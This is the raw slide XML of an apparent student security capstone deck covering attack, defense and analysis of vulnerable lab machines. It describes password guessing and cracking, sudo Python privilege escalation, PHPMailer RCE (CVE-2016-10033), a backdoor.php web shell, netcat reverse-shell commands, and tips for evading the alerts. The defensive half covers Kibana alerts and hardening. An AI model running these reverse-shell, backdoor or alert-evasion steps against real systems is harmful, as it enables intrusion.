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58"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="263" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="271" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="272" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="284" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="287" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="286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8" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="295" r:id="rId36"/>
    <p:sldId id="296" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="298" r:id="rId39"/>
    <p:sldId id="303" r:id="rId40"/>
    <p:sldId id="302" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="299" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="293" r:id="rId47"/>
    <p:sldId id="308" r:id="rId48"/>
    <p:sldId id="311" r:id="rId49"/>
    <p:sldId id="312" r:id="rId50"/>
    <p:sldId id="309" r:id="rId51"/>
    <p:sldId id="316" r:id="rId52"/>
    <p:sldId id="315" r:id="rId53"/>
    <p:sldId id="310" r:id="rId54"/>
    <p:sldId id="314" r:id="rId55"/>
    <p:sldId id="313" r:id="rId56"/>
    <p:sldId id="31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B31-FFA8-4142-A6C5-E02E253D9034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EC961-AEC9-5B4A-85C7-E0F55EFBA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1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EC961-AEC9-5B4A-85C7-E0F55EFBAD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3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6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6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0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8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1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3/1/21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3/1/21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7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2.eu/file/kibana-logo-color-vpng" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vcloudnine.de/moving-a-small-on-prem-environment-to-azure-o365-part-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unixmen.com/pcman-an-alternative-file-manager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kpik.com/delta-wings-aircraft-stealth-bomber-cloak-of-invisibility-b-2-spirit-northrop-grumman-34074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vishal--mishra.blogspot.com/2012/08/netcat-swiss-army-knife.html" TargetMode="External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4dev.com/journal/2017/11/16/elk-stack-with-docke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vishal--mishra.blogspot.com/2012/12/ufw-uncomplicated-firewall.html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Wordpress_logo_8.p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cadeandarporcasa.blogspot.com/2013/03/configuracion-de-wireshark-para-que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vinylmeplease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reen.mattingsolutions.co/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hyperlink" Target="http://31.7.62.214/fakeurl.ht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9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3" descr="Audio waveform abstract on neon colors">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE18EA87-3F8E-40D1-90D1-2B75092D6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9" b="82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7" name="Rectangle 21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544047"/>
            <a:ext cx="12191982" cy="332189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9E54B-B742-684F-9DAD-0066BDEE0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3307" y="2179270"/>
            <a:ext cx="8625385" cy="272955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Final Engagement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Attack, Defense &amp; Analysis of a Vulnerable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CD32D-F9E6-0D46-A4A6-53C822132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1260" y="4908825"/>
            <a:ext cx="5909481" cy="1689200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sexton &amp; Associates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presented BY: Eric, Daniel, Chadwick, raven, JP, Kelvin, David </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156781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Exploitation : Weak Passwords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Michael had an easily guessable password that allowed access into the server.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Once user shell was obtained, default credentials for MySQL database found stored in /var/www/html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66E229-2456-7A4D-B7CD-9A7F032BE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1" y="3429000"/>
            <a:ext cx="5026152" cy="22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D491981-5C25-4043-A9EB-A5D31584B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87" y="3407096"/>
            <a:ext cx="5026152" cy="230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64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– Flag 1 &amp;2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543328" y="1717714"/>
            <a:ext cx="65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Flag2.txt was found at this stage in /var/www/ directory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05A7C49-5F9E-544F-A689-36AF8B6A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859" y="2247422"/>
            <a:ext cx="7239000" cy="1463675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F7195-013C-9E45-91F9-77D5BD5296B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543328" y="3871473"/>
            <a:ext cx="695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Flag1 was found in /var/www/html/service.html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2635DA14-8534-8146-956B-63FD0C1C7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70" y="4401181"/>
            <a:ext cx="5952191" cy="195750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07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Exploitation : Weak Passwords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Password hashes were found in MySQL database inside wp-users table.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User Steven had password hash cracked by John the Ripper.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90DDBA-D47F-3F4A-A970-1E2E926E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269" y="5121951"/>
            <a:ext cx="8305800" cy="16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58390D5-B0F9-E744-8923-2C127E057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5" y="3136245"/>
            <a:ext cx="7477125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50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Exploitation : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>CVE-2006-0151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Running the sudo -l command showed that Steven is able to run Python as root.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By calling on Python, we were able to escalate privileges and gain a root shell.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A91F20A-68AA-E340-9431-53211131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950950"/>
            <a:ext cx="4476748" cy="21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3FB2C4D-5FCA-5A48-926B-E4A5EE22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9" y="3950950"/>
            <a:ext cx="4743449" cy="21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75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– Flag 3 &amp;4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543328" y="1717714"/>
            <a:ext cx="65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Flag3 was found in the wp_post table in the WordPress Data base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F7195-013C-9E45-91F9-77D5BD5296B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543328" y="3871473"/>
            <a:ext cx="695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Flag4 was found when root was obtained.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0714E85-D59E-AE49-8A68-ED951C43D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50" y="3657600"/>
            <a:ext cx="4750709" cy="3056968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1964A2EC-2709-3449-8AD2-2663EF8B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305" y="2256056"/>
            <a:ext cx="6958013" cy="116205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0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96" y="1371600"/>
            <a:ext cx="7753235" cy="394862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Reconnaissance and Exploitations of Target 2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5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Critical Vulnerabilities: Target 2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AAAC71-11A9-2340-A498-0820EF265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710596"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1278995" y="1684020"/>
          <a:ext cx="9634010" cy="46710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39352">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3798674658"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2806591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3080859825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3688067">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2446688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43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 Listing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Unsecured web servers may be Brute-Forced to enumerate unintentional public-facing URLs.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Brute-Force Directory Enumeration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 Traversal</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br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 Server doesn’t require authorization to access confidential files and folders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Exposed files and folders; vulnerable version of PHP Mailer found</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0"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CVE-2016-10033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Older version of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PHPMailer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allow for Remote Code Execution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Reverse Shell Established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1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982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2 Exploitation : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Directory Listing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Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allow for Brute Force Enumeration of exposed directories.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Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exposed the vendor directory, which was later used to find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PHPMailer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability to do RCE on.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173B4C0-02D2-124B-BCFA-733034A5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13125" r="8148" b="7333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069848" y="3429000"/>
            <a:ext cx="4543828" cy="318903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320A485-5699-6240-9823-14B07376B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15625" r="11895" b="7334"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6319183" y="3428999"/>
            <a:ext cx="4413251" cy="3189033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9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2 Exploitation : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Path Traversal Vulnerability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Using the Firefox browser allowed us to examine directories and read confidential files.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 vulnerable, outdated version of the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PHPMailer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was found being used.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4F2B051-B28F-1F46-8C29-CB8B654CAE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t="15208" r="18741" b="24386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3338512" y="3221950"/>
            <a:ext cx="5514976" cy="3395202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow>
              <a:schemeClr val="accent6">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:glow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1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2 – Flag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616200" y="1909524"/>
            <a:ext cx="652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Flag 1 was found in the vendor Directory on the website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8DE730DC-4733-9F49-87FA-BF2031AF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92" y="3636170"/>
            <a:ext cx="7188200" cy="1485900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3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EE2A-80A2-654E-8923-9759F49AF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420914"/>
            <a:ext cx="8385048" cy="998582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85632-C773-C348-ABE2-A2A07AD99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1735" y="1911757"/>
            <a:ext cx="2740551" cy="3034485"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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cap="none" dirty="0"/>
              <a:t>Offense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cap="none" dirty="0"/>
              <a:t>Defense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200" b="1" cap="none" dirty="0"/>
              <a:t>Network</a:t>
            </a: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1F22028E-5F83-A641-A92D-7A37BA05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V="1">
            <a:off x="-32747480" y="-34529824"/>
            <a:ext cx="35874049" cy="32788110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132D2143-16CB-7348-A9CC-CE803DB6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713" y="3488918"/>
            <a:ext cx="2464430" cy="2252436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Picture 214" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCEE3C0A-2E4C-9945-A44B-384797F9D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12269" y="3752173"/>
            <a:ext cx="2380282" cy="1917700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Picture 217" descr="Logo, company name&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D62339B-CB22-8342-9568-28EE866F7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58756" y="5171803"/>
            <a:ext cx="3136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68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2 Exploitation : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>CVE-2016-10033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Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PHPMailer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shows an exploit for outdated versions.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CVE-2016-10033 allows for remote attackers to execute code.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7F5BCD0-5654-9447-ACAC-594C00EF1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29100"/>
            <a:ext cx="5407525" cy="2443163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47613E4-FC03-FB4E-956B-27E233CBF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t="46342" r="14911" b="7315"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="422119" y="3429000"/>
            <a:ext cx="6777441" cy="556261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93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2 – Flag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1909524"/>
            <a:ext cx="9634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After the listener was set up, we were able to connect to Box 2/Target 2. From here we navigated to the /var/www directory locating a flag2.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0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EB40AFE2-56C7-384B-87CB-9146E589F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832854"/>
            <a:ext cx="7924800" cy="6477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B4475D-C1CD-EA4D-8619-BD30ACDF86B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="4025147"/>
            <a:ext cx="9634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Navigating to the WordPress upload directory /var/www/html/wordpress/wp-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/uploads/2018/11/flag3.png</a:t>
            </a:r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171C0DFC-DA9F-5E48-9384-3C3CC4BD8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75238"/>
            <a:ext cx="7924800" cy="622300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87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Avoiding Detection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2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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stealth Exploitation of Weak Passwords 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200553" y="1700986"/>
            <a:ext cx="7772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Monitoring Overview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Triggering Alert:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“WHEN count() GROUPED OVER top 5 'http.response.status_code’       IS ABOVE 400 FOR THE LAST 5 minutes”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Packetbeat is used to measure how many excessive HTTP errors are found.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 threshold to set off this alert is when there are over 5 errors with in the past 5 minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mitigating Detection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This can be circumvented by limiting the number of attempts made within the time frame.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An alternative way to find a weak password would use phishing.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128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Stealth Exploitation of Exposed WordPress Credentials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200553" y="1700986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Monitoring Overview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Triggering alert:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“WHEN sum() of http.request.bytes OVER all documents IS ABOVE 3500 FOR THE LAST 1 minute”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(Triggered when request is over 3500 bytes within 1 minutes.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mitigating Detection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 a cached version of the website. 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Decrease specific files to search for.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Use multiple proxies.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A picture containing sky, plane, flying, outdoor&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CA588C-7868-9E4B-A346-A097DA5E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4987" y="4586288"/>
            <a:ext cx="6035675" cy="176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5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Stealth Exploitation of Directory Traversal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200553" y="1700986"/>
            <a:ext cx="7772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Monitoring Overview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Triggering Alert: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“WHEN max() OF system.process.cpu.total.pct OVER all documents IS ABOVE 0.5 FOR THE LAST 5 minutes”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(Triggered at 0.5% increase in CPU usage with in 5 minutes.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mitigating Detection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Very low CPU intensive actions such as using the built-in explorer i.e., CLI.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Cross side scripting to keep CPU usage low.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Maintaining Access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8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Backdooring the Target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200553" y="1700986"/>
            <a:ext cx="7772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Backdoor Overview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Access was gained via reverse shell.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Exploit.sh was used to install backdoor.php onto the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>netcat was used to set up a listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali: nc -lnvp 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL: nc &lt;192.168.1.90&gt; 4444 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the listener, we were able to gain access to a shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://&lt;192.168.1.115&gt;/backdoor.php?cmd=&lt;CMD&gt;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How do you connect to it? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nc &lt;192.168.1.90&gt; 4444 -e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i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163294C4-DCCB-C84A-8FCA-3CAE2033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3888" y="4740064"/>
            <a:ext cx="2595562" cy="161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8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Defense - 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52D3-D2DE-2449-9507-DBC5582F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4805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/>
              <a:t>Critical Vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Alerts Implemented</a:t>
            </a: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b="1" dirty="0"/>
              <a:t>Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Implementing Patches</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A picture containing pie chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB054283-0BFA-774E-AA2F-C98F7B012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93859" y="4456757"/>
            <a:ext cx="3810000" cy="162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2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Critical Vulnerabilities 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24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Offense - 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52D3-D2DE-2449-9507-DBC5582F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/>
              <a:t>Network Topology </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Reconnaissance and Exploitations of Target 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Reconnaissance and Exploitations of Target 2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F480DE34-8861-A044-968D-EB694317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229" y="4616340"/>
            <a:ext cx="3218176" cy="20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3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999" y="2931736"/>
            <a:ext cx="7651976" cy="3570663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:b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B4555F-1C50-1049-BA20-441F769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3" y="1074057"/>
            <a:ext cx="8650153" cy="56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7A0AE-2EF1-EC40-BB2D-371FD8293CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247103" y="355601"/>
            <a:ext cx="632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Network Topology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32B8-9DD4-D94B-A99C-156A620BC60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9283358" y="471714"/>
            <a:ext cx="2824501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Roboto"/>
              </a:rPr>
              <a:t>Network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Address Range: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192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 10.0.0.1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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Machines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IPv4: 192.168.1.100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ELK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 192.168.1.90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Kali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 192.168.1.110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Target 1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IPv4:192.168.1.115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Apache/2.4.10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Target 2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52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Critical Vulnerabilities: Target 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AAAC71-11A9-2340-A498-0820EF265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63874"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1278995" y="1684020"/>
          <a:ext cx="9634010" cy="4297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39352">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3798674658"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2806591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3080859825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3688067">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2446688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43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Access to ports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access to open ports 22 and 80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 common ports facilitate brute force attacks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Enumerating usernames in Wordpress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Easy identification of usernames on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Credentials provide easy access for attackers</a:t>
                      </a:r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Simple Passwords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Passwords lacking variation or length.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Passwords can easily be brute-forced or guessed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1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Root vulnerability with Python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Allows local users to gain privileges via Python script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Permits full administrative access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5460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Critical Vulnerabilities: Target 2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AAAC71-11A9-2340-A498-0820EF265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00212"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1278995" y="1684020"/>
          <a:ext cx="9634010" cy="422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39352">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3798674658"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2806591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3080859825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3688067">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2446688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43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Unsecured/Open Ports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SSH(22), HTTP(80)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Remote access via SSH and unsecured traffic between requests.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9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Directory Listing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Facing Directories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 sensitive information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3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Un-patched/Vulnerable Software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Outdated, vulnerable software is being used.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br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Contains vulnerabilities patched by newer versions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17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75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Alerts Implemented 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002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Excessive HTTP Errors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16002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u="sng" dirty="0"/>
              <a:t>Metric:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Count of top 5 http.response.status_code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Threshold:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Above 400 over the last 5 minutes.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4D0EEC97-D5FB-0343-82BD-6FE6991F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2" y="2679204"/>
            <a:ext cx="6583363" cy="4007345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09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HTTP Request Size Monitor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1600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u="sng" dirty="0"/>
              <a:t>Metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Sum of http_request_bytes over all documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US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u="sng" dirty="0"/>
              <a:t>Threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Above 3500 over the last 1 minute.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394AEB52-7F21-C64D-AC5D-68BCFFBB6D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9" t="7334" b="38333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1935956" y="2803208"/>
            <a:ext cx="8320087" cy="372618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90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CPU Usage Monitor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160020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u="sng" dirty="0"/>
              <a:t>Metric:</a:t>
            </a:r>
            <a:r>
